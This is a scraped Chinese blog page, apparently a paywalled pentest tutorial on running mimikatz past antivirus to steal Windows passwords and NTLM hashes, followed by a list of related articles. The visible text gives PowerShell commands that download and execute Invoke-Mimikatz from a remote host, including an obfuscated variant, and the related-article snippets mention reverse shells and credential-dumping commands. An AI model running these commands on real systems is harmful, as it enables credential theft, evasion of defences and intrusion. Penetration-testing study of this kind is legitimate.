几种姿势运行mimikatz

最新推荐文章于 2024-07-04 11:22:20 发布
最新推荐文章于 2024-07-04 11:22:20 发布
阅读量4.8k 收藏 5
点赞数
分类专栏: 内网渗透 文章标签: mimikatz Windows 密码抓取 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_Z_W_/article/details/104063898
版权
本文介绍了六种运行mimikatz的方法,包括powershell、.net2.0、js、.net4.0、Jscript的xsl版以及利用procdump导出lsass进程,以在内网渗透中规避杀软拦截,获取Windows明文密码和NTLM哈希值。在实际操作中,不同方法的免杀效果在360和火绒安全软件上有所差异。
摘要由CSDN通过智能技术生成

Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的神器,内网渗透中常用mimikatz获取明文密码或者获取hash值来漫游内网。但是在实际的运用中,常常会遇到杀软的拦截,所以这里我借鉴网上的资料,进行复现学习,达到免杀绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。

姿势一:powershell

https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1

cmd下执行,360没有拦截

powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"


powershell运行会被拦截

powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.30.139/Invoke-Mimikatz.ps1');Invoke-Mimikatz

简单混淆还是被拦截了

powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.30'+'.139/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11
最低0.47元/天 解锁文章
小晓晓晓林
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)
qq_45290991的博客
09-16 1123
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap) 很紧张很“充实”的培训,今天主要是教了怎么抓取PC的密码…… 密码抓取5法 1.1mimikatz抓取明文密码 mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里猎取windows处于active状态账号明文密码,非常强大。 在网上找了一些相关的文章自己的一点总结吧 下载地址:https://github.com/gentilkiwi/mimikatz/rele
mimikatz使用以及源码动态分析
weixin_46956745的博客
05-08 2882
mimikatz使用以及源码分析 文章目录mimikatz使用以及源码分析前言一、mimikatz安装运行二、mimikatz源码分析1.函数具体功能2.函数源码分析(动态)总结 前言 Mimikatz 是法国人 Gentil Kiwi 编写的一款 windows 平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取 windows 处于 active 状态账号的明文密码mimikatz 的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz
Mimikatz的18种免杀姿势及防御策略
最新发布
2301_76786857的博客
07-04 152
本文主要介绍了如下5类免杀方式,共18种免杀方法。本文虽然是针对Mimiktaz进行免杀,但更多的是想研究学习一下比较通用的exe的免杀方式,比如文中介绍的exe通用加载器、powershell执行exe、白名单加载exe等有几种方法可以适用于任意的exe免杀,如果只是针对mimikatz进行免杀完全没必要这么啰嗦的。1、源码免杀。在有源码的情况下,可以定位特征码、加花指令、多层跳转、加无效指令、替换api、重写api、API伪调用等等,这部分内容较多略复杂,打算另写一篇进行介绍,本文不多介绍。
关于mimikatz在webshell运行
weixin_30955617的博客
08-03 960
直接运行mimikatz.exe虽然可以激活进程,但看不到交互界面,姿势: 1、nc反弹,本地nc监听,然后上传nc到web服务器并执行反弹命令 2、直接执行mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt #之前试过不加exit,会无限重定向到password.txt,...
mimikatz使用详解
qq_59468567的博客
04-12 515
该模块是用于提权的模块,很多模块需要高权限运行,所以要先进行提权,只能用具有管理员权限的命令行窗口才可以执行成功,普通用户使用提权命令会失败。其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块。改模块是对Local Security Authiruty(LSA)进行密码抓取的模块。使用该模块需要高权限,因此需要执行提权命令,如下是常用命令。该模块是与Kerberos相关的模块。• privilege 提权模块。• kerberos包模块。
mimikatz免杀(反射PE注入将mimikatz加载到内存运行
sweelg的博客
10-17 964
在powershell中生成key.snk $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZh
内网渗透神器(Mimikatz)——使用教程,你会的还只有初级工程师的技术吗
2401_84446919的博客
04-18 1275
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等。从sam.hive和system.hive文件中获得NTLM Hash。sr98: 用于SR98设备和T5577目标的RF模块。rdm: RDM(830AL)器件的射频模块。rpc: mimikatz的RPC控制。导出lsass.exe进程中所有的票据。(在域控上执行)读取所有域用户的哈希。acr: ACR模块。开启Wdigest Auth。关闭Wdigest Auth。
mimikatz获取系统密码
03-28
1. **权限要求**: 要成功运行mimikatz,通常需要本地管理员权限,但某些操作可能需要更高的权限,如域管理员。 2. **法律与道德**: 使用mimikatz必须遵守当地法律法规,确保在授权的范围内进行,否则可能触犯法律。...
mimikatz_trunk2.1.1.zip
08-03
标题中的"mimikatz_trunk2.1.1.zip"指的是mimikatz的一个历史版本,这个版本可能在Windows 10操作系统上仍然能够正常运行。本文将深入探讨mimikatz的功能、原理以及在Windows系统中的应用。 mimikatz是由法国安全...
内网渗透专用-mimikatz
05-06
4. `x64`和`Win32`:这两个目录可能分别包含了适用于64位和32位Windows操作系统的mimikatz二进制文件,确保在不同系统环境下可以运行。 通过这些文件,用户不仅可以了解到mimikatz的基本使用,还可以深入学习如何...
mimikatz最新版本
11-20
“嗅探hash”是mimikatz的重要功能之一,它能够捕获系统中正在运行的进程的NTLM哈希。在Windows系统中,NTLM是一种身份验证协议,用于在网络通信中验证用户身份。然而,由于NTLM哈希可以在不直接获取明文密码的情况...
XXX.rar_H XXX_XXX.www._https://cn.txxx.com_wwwxxxex_xxxwww.98
09-23
信号处理入门级程序,包含了数据采集,频谱分析等
mimikatz_trunk-1_mimikatz_
10-03
它们可能包含了对应平台的mimikatz可执行文件或其他依赖库,使得用户能够在不同架构的系统上运行mimikatz。 使用mimikatz时,需要注意的是,尽管它有合法的安全用途,但未经授权的密码获取可能触犯法律。因此,正确...
Github项目上传所遇到的问题
bm626hb的博客
05-08 727
一、具体操作步骤 前期准备需下载git工具,需要确保有可用的代理并进行相应配置,以及需要生成ssh密钥(步骤对应问题记录的第三点)。上传步骤比较简单,见教你如何上传项目到GitHub - 不忘编码 - 博客园 二、问题记录 1.项目大小限制 在未删除数据文件和虚拟环境之前,项目大小达到700M以上,上传失败 解决方法:删除上述两项后,70M以上文件能够成功上传 2.git add 遇到了The file will have its original line endings in your wo
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4350
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
Powershell管理系列(三十五)PowerShell操作之以管理员权限运行脚本
weixin_34061042的博客
10-20 1397
-----提供AD\Exchange\Lync\Sharepoint\CRM\SC\O365等微软产品实施及外包,QQ:185426445.电话18666943750场景:Win10或者是非管理员权限运行命令行的时候,提示无权限,如下图我们可以右键Powershell,以管理员权限运行,或者是计划任务设置为以管理员权限运行,其实我们有更加高效的办法,可以直接提权运行脚本,如下图,输入用户名和密码,...
powershell怎么默认以管理员权限运行
温故知新
04-14 3804
powershell怎么默认以管理员权限运行 1. 搜索powershell, 右键打开文件所在位置 2. 点击powershell, 右键点击属性
百度支付管理后台操作指引说明
a12135433的博客
05-29 1001
开通完支付账户后,在“小程序开发者平台 - 运营中心 - 支付管理”中,进行支付相关的业务操作。支付管理包含了支付设置、订单管理、财务管理。
MediaCodec之Decoder
热门推荐
hubinbin595959的专栏
05-08 50万+
1.介绍: MediaCodec类可用于访问Android底层的媒体编解码器,也就是,编码器/解码器组件。它是Android底层多媒体支持基本架构的一部分(通常与MediaExtractor, MediaSync, MediaMuxer, MediaCrypto, MediaDrm, Image, Surface, 以及AudioTrack一起使用);MediaCodec作为比较年轻的Androi...
"2020年06月,Mimikatz的18种免杀姿势及防御策略
以下是其中的几种免杀姿势以及相应的防御策略。 首先,免杀姿势0x00是指对mimikatz.exe进行变形,以躲避杀软的监控。而防御策略可以包括及时更新杀软的识别规则、使用行为监测工具对进程行为进行监控等方法来减少...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值